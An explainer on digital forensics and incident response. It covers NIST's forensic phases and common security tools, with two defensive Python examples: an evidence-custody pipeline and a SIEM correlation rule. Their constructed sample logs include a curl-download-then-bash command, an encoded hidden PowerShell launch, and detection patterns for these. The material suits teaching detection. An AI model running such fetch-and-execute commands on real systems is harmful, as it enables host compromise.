Digital forensics and incident response, or DFIR, combines two cybersecurity fields to streamline threat response while preserving the evidence needed to hold attackers accountable.
DFIR integrates two discrete cybersecurity disciplines: digital forensics, the investigation of cyberthreats, primarily to gather digital evidence for prosecuting cybercriminals; and incident response, the detection and mitigation of cyberattacks in progress. Combining the two helps security teams stop threats faster while preserving evidence that might otherwise be lost in the urgency of threat mitigation.
Digital forensics investigates and reconstructs cybersecurity incidents by collecting, analyzing and preserving digital evidence: the traces left behind by threat actors, such as malware files, malicious scripts and log entries. These reconstructions allow investigators to pinpoint the root causes of attacks and identify the culprits.
Digital forensic investigations follow a strict chain of custody, a formal process for tracking how evidence is gathered and handled. In practice this means hashing every acquired image or file at collection, working only on verified copies, and re-checking the hash each time the evidence changes hands. The chain of custody allows investigators to prove that evidence wasn't tampered with. As a result, evidence from digital forensics investigations can be used for official purposes like court cases, insurance claims and regulatory audits.
The National Institute of Standards and Technology (NIST) outlines four steps for digital forensic investigations: collection, examination, analysis and reporting.
Collection: After a breach, forensic investigators collect data from operating systems, user accounts, mobile devices and any other hardware and software assets that threat actors may have accessed. Common sources of forensic data include:
To preserve evidence integrity, investigators make verified copies of data before processing it. They secure the originals so that they cannot be altered, and the rest of the investigation is carried out on the copies.
Examination: Investigators comb through the data for signs of cybercriminal activity, such as phishing emails, altered files and suspicious connections.
Analysis: Investigators use forensic techniques to process, correlate and extract insights from digital evidence. They may also reference proprietary and open-source threat intelligence feeds to link their findings to specific threat actors.
Reporting: Investigators compile a report that explains what happened during the security event and, if possible, identifies suspects or culprits. The report may contain recommendations for thwarting future attacks. It can be shared with law enforcement, insurers, regulators and other authorities.
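The four phases above, carried end to end over a small constructed auth log, as an added example that is not code from the original page or from NIST. Everything in it is assumed for illustration: the log lines, the detection patterns, the threat-intel mapping with its hypothetical actor name, and the analyst identity. Collection copies and hashes the evidence and makes the original read-only; examination scans only the copy; analysis correlates the findings into a storyline and attributes indicators; reporting re-verifies the original's hash so the chain of custody can be shown unbroken.

```python
"""Evidence pipeline over the four NIST phases (collect, examine, analyze, report).
Added example, not code from the page or from NIST; the auth log, patterns,
threat-intel mapping and analyst name are all constructed."""
import hashlib
import re
import shutil
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Constructed sample evidence: an SSH/sudo auth log from a compromised host.
SAMPLE_AUTH_LOG = """\
Mar 10 02:14:07 web01 sshd[4123]: Failed password for root from 198.51.100.23 port 50311 ssh2
Mar 10 02:14:09 web01 sshd[4123]: Failed password for root from 198.51.100.23 port 50311 ssh2
Mar 10 02:14:12 web01 sshd[4123]: Accepted password for root from 198.51.100.23 port 50311 ssh2
Mar 10 02:15:40 web01 sudo: root : COMMAND=/usr/bin/curl http://203.0.113.9/x.sh -o /tmp/x.sh
Mar 10 02:15:41 web01 sudo: root : COMMAND=/bin/bash /tmp/x.sh
Mar 10 03:01:02 web01 sshd[4201]: Accepted publickey for deploy from 192.0.2.10 port 41022 ssh2
"""
# Constructed threat-intel feed: indicator -> attribution (hypothetical actor name).
THREAT_INTEL = {"198.51.100.23": "ACTOR-EXAMPLE-1 brute-force source",
                "203.0.113.9": "ACTOR-EXAMPLE-1 payload staging host"}
# Constructed examination patterns: what "signs of cybercriminal activity" look like here.
PATTERNS = {
    "failed_login": re.compile(r"Failed password for (\S+) from (\S+)"),
    "accepted_login": re.compile(r"Accepted \w+ for (\S+) from (\S+)"),
    "remote_download": re.compile(r"COMMAND=.*?(curl|wget)\s+(\S+)"),
    "script_exec": re.compile(r"COMMAND=.*?(bash|sh)\s+(/tmp/\S+)"),
}
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):  # chunked: images can be large
            h.update(chunk)
    return h.hexdigest()

def collect(original: Path, workdir: Path, handler: str) -> dict:
    """Collection: copy the evidence, hash original and copy, lock the original, record custody."""
    copy = workdir / (original.name + ".copy")
    shutil.copyfile(original, copy)
    digest = sha256_file(original)
    if sha256_file(copy) != digest:
        raise RuntimeError("working copy does not match the original")
    original.chmod(0o400)  # original becomes read-only; all further work uses the copy
    return {"source": str(original), "working_copy": str(copy), "sha256": digest,
            "handler": handler, "collected_at": datetime.now(timezone.utc).isoformat()}

def examine(copy: Path) -> list:
    """Examination: scan the working copy for indicators of attacker activity."""
    findings = []
    for n, line in enumerate(copy.read_text().splitlines(), 1):
        for kind, rx in PATTERNS.items():
            m = rx.search(line)
            if m:
                findings.append({"line": n, "type": kind, "match": m.groups(), "raw": line})
    return findings

def analyze(findings: list) -> dict:
    """Analysis: correlate findings into a storyline and attribute indicators via threat intel."""
    fails_by_ip = {}
    for f in findings:
        if f["type"] == "failed_login":
            fails_by_ip[f["match"][1]] = fails_by_ip.get(f["match"][1], 0) + 1
    # A successful login preceded by repeated failures from the same source is a brute-force win.
    compromised = [{"user": f["match"][0], "ip": f["match"][1], "line": f["line"]} for f in findings
                   if f["type"] == "accepted_login" and fails_by_ip.get(f["match"][1], 0) >= 2]
    post_exploitation = [f for f in findings if f["type"] in ("remote_download", "script_exec")]
    attribution = {ip: THREAT_INTEL[ip] for f in findings
                   for ip in IP_RE.findall(f["raw"]) if ip in THREAT_INTEL}
    return {"compromised": compromised, "post_exploitation": post_exploitation,
            "attribution": attribution}

def report(custody: dict, findings: list, analysis: dict) -> dict:
    """Reporting: what happened, how far it went, what to fix; re-verify the original's hash."""
    unchanged = sha256_file(Path(custody["source"])) == custody["sha256"]
    recs = []
    if any(c["user"] == "root" for c in analysis["compromised"]):
        recs.append("Disable password authentication for root over SSH.")
    if analysis["attribution"]:
        recs.append("Block attributed indicators: " + ", ".join(sorted(analysis["attribution"])))
    return {"chain_of_custody": dict(custody, original_unchanged=unchanged),
            "finding_count": len(findings),
            "compromised_accounts": analysis["compromised"],
            "post_exploitation_events": len(analysis["post_exploitation"]),
            "attributed_indicators": analysis["attribution"],
            "recommendations": recs}

def run_investigation(workdir=None, handler: str = "analyst@example.test") -> dict:
    """Write the constructed evidence to disk and run all four phases over it."""
    workdir = Path(workdir or tempfile.mkdtemp(prefix="dfir-"))
    original = workdir / "auth.log"
    original.write_text(SAMPLE_AUTH_LOG)
    custody = collect(original, workdir, handler)
    findings = examine(Path(custody["working_copy"]))
    return report(custody, findings, analyze(findings))

if __name__ == "__main__":
    print(run_investigation())
```

The deploy user's key-based login on the last log line is deliberately left in: it is a successful login that the brute-force rule must not flag, and the report shows that it does not.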
Incident response focuses on detecting and responding to security breaches. Its goal is to prevent incidents where possible and to minimize the cost and business disruption of those that do occur.
Incident response efforts are guided by an incident response plan (IRP), which outlines how the incident response team should deal with cyberthreats. The incident response process has six standard steps:
When digital forensics and incident response are conducted separately, they can interfere with one another. Incident responders can alter or destroy evidence while removing a threat from the network, and forensic investigators may delay threat resolution as they search for evidence. Information may not flow between these teams, making everyone less efficient than they could be.
DFIR fuses these two disciplines into a single process carried out by one team. This yields two important advantages:
Forensic data collection happens alongside threat mitigation. During the DFIR process, incident responders use forensic techniques to collect and preserve digital evidence while they are containing and eradicating a threat: for example, capturing volatile data such as memory, running processes and active network connections before a host is isolated, reimaged or rebooted, since those containment actions destroy it. This keeps the chain of custody intact and prevents valuable evidence from being altered or destroyed by incident response efforts.
Post-incident review includes examination of digital evidence. DFIR uses digital evidence to dive deeper into security incidents. DFIR teams examine and analyze the evidence they’ve gathered to reconstruct the incident from start to finish. The DFIR process ends with a report detailing what happened, how it happened, the full extent of the damage and how similar attacks can be avoided in the future.
Resulting benefits include:
In some companies, an in-house computer security incident response team (CSIRT), sometimes called a computer emergency response team (CERT), handles DFIR. CSIRT members may include the chief information security officer (CISO), security operations center (SOC) and IT staff, executive leaders and other stakeholders from across the company.
Many companies lack the resources to carry out DFIR on their own. In that case, they may hire third-party DFIR services that work on retainer.
Both in-house and third-party DFIR experts use the same DFIR tools to detect, investigate and resolve threats. These include:
Security information and event management (SIEM): SIEM collects and correlates security event data from security tools and other devices on the network.
Security orchestration, automation, and response (SOAR): SOAR enables DFIR teams to collect and analyze security data, define incident response workflows and automate repetitive or low-level security tasks.
Endpoint detection and response (EDR): EDR integrates endpoint security tools and uses real-time analytics and AI-driven automation to protect organizations against cyberthreats that get past antivirus software and other traditional endpoint security technologies.
Extended detection and response (XDR): XDR is an open cybersecurity architecture that integrates security tools and unifies security operations across all security layers—users, endpoints, email, applications, networks, cloud workloads and data. By eliminating visibility gaps between tools, XDR helps security teams to detect and resolve threats faster and more efficiently, limiting the damage that they cause.
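What "collects and correlates" means in practice for the SIEM entry above, as an added example that is not the page's code and not any vendor's product: a rule that joins EDR process telemetry with firewall logs through an asset inventory and fires only when an encoded PowerShell launch is followed within five minutes by an allowed outbound connection from the same host to an address outside the organisation's internal ranges. The events, the inventory, the internal ranges and the five-minute window are all constructed assumptions.

```python
"""SIEM-style correlation across two sources: EDR process telemetry and firewall logs.
Added example, not code from the page or from any SIEM product; the events, asset
inventory, internal ranges and rule thresholds are all constructed."""
import ipaddress
import json
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed EDR telemetry, one JSON object per line.
EDR_EVENTS = """\
{"time": "2024-03-10T02:20:01Z", "host": "ws-17", "user": "jdoe", "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"time": "2024-03-10T02:30:00Z", "host": "ws-22", "user": "asmith", "cmdline": "git pull origin main"}
{"time": "2024-03-10T02:45:10Z", "host": "ws-17", "user": "jdoe", "cmdline": "notepad.exe report.txt"}
"""
# Constructed firewall syslog with key=value fields.
FIREWALL_EVENTS = """\
2024-03-10T02:21:15Z fw01 action=allow src=10.0.5.17 dst=203.0.113.44 dport=443 proto=tcp
2024-03-10T02:31:05Z fw01 action=allow src=10.0.5.22 dst=142.250.72.14 dport=443 proto=tcp
2024-03-10T02:46:00Z fw01 action=allow src=10.0.5.17 dst=10.0.0.5 dport=445 proto=tcp
"""
# Constructed asset inventory (hostname -> address) and the organisation's internal ranges.
ASSETS = {"ws-17": "10.0.5.17", "ws-22": "10.0.5.22"}
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

ENCODED_PS = re.compile(r"powershell(?:\.exe)?.*\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
WINDOW = timedelta(minutes=5)  # assumed correlation window

@dataclass
class Event:
    time: datetime
    host: str
    source: str
    fields: dict

def parse_time(s: str) -> datetime:
    return datetime.fromisoformat(s.replace("Z", "+00:00"))

def parse_edr(text: str) -> list:
    """Normalise EDR JSON lines into Events keyed by hostname."""
    out = []
    for line in text.splitlines():
        if line.strip():
            rec = json.loads(line)
            out.append(Event(parse_time(rec["time"]), rec["host"], "edr", rec))
    return out

def parse_firewall(text: str) -> list:
    """Normalise firewall lines into Events, resolving the source IP to a hostname via the inventory."""
    ip_to_host = {ip: host for host, ip in ASSETS.items()}
    out = []
    for line in text.splitlines():
        if line.strip():
            ts, _device, *kv = line.split()
            fields = dict(tok.split("=", 1) for tok in kv)
            host = ip_to_host.get(fields.get("src"), fields.get("src"))
            out.append(Event(parse_time(ts), host, "firewall", fields))
    return out

def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL)

def correlate(events: list) -> list:
    """Rule: encoded PowerShell on a host, then an allowed outbound connection from the
    same host to an external address within WINDOW. Either event alone is treated as noise."""
    events = sorted(events, key=lambda e: e.time)
    alerts = []
    for i, trigger in enumerate(events):
        if trigger.source != "edr" or not ENCODED_PS.search(trigger.fields.get("cmdline", "")):
            continue
        for follow in events[i + 1:]:
            if follow.time - trigger.time > WINDOW:
                break
            if (follow.source == "firewall" and follow.host == trigger.host
                    and follow.fields.get("action") == "allow" and is_external(follow.fields["dst"])):
                alerts.append({"rule": "encoded_powershell_then_egress", "severity": "high",
                               "host": trigger.host, "user": trigger.fields.get("user"),
                               "trigger_time": trigger.time.isoformat(),
                               "dst": follow.fields["dst"], "dport": follow.fields.get("dport")})
    return alerts

def run_rule() -> list:
    return correlate(parse_edr(EDR_EVENTS) + parse_firewall(FIREWALL_EVENTS))

if __name__ == "__main__":
    for alert in run_rule():
        print(json.dumps(alert))
```

Neither an encoded PowerShell launch nor an outbound HTTPS connection is alarming on its own; the rule's value is the join across two tools, which is exactly the visibility gap that SIEM and XDR exist to close. The workstation that runs git and the later SMB connection to an internal file server both pass through without an alert.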